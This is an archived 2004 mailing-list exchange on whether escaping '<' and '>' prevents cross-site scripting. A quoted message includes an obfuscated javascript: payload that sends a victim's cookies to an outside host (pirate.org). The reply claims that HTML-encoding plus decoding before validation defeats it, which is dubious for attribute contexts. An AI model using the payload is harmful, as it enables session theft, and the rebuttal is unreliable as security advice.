WebApp Sec mailing list archives
Re: [Re: AppSec FAQ at OWASP]
From: Rohyt Belani <rohytbelani () hotmail com>
Date: 30 Jan 2004 15:43:28 -0000
In-Reply-To: <02ca01c3e706$59b8f720$ec658009@pprados>
An easier solution to prevent XSS attacks might be to HTML encode the "<"and ">" characters as < and >. So even if they are accepted as input from the user, it would not result in the execution of a script like <script>...</script>. It's not correct. With this code : <a href="<%= escapeHTML(url)%>/doc.html">Document</a> The hacker can inject in the variable url the value : javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119 ,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112 ,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101 ,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,1 01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62)) and execute a script without <, > or &! Phil
The solution I proposed for HTML encoding characters like < and > will still be effective in the case you mentioned. This is because the underlying principle for good input validation routines is to first decode the encoded URL and then perform input validation. By doing so all encoding attacks like the one you mentioned can be prevented from executing successfully.
Current thread:
- Re: [Re: AppSec FAQ at OWASP] Sangita Pakala (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Omar Ismail (Jan 29)
- <Possible follow-ups>
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Philippe P. (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Philippe Prados (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Ulf Härnhammar (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Omarjan Ismail (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 30)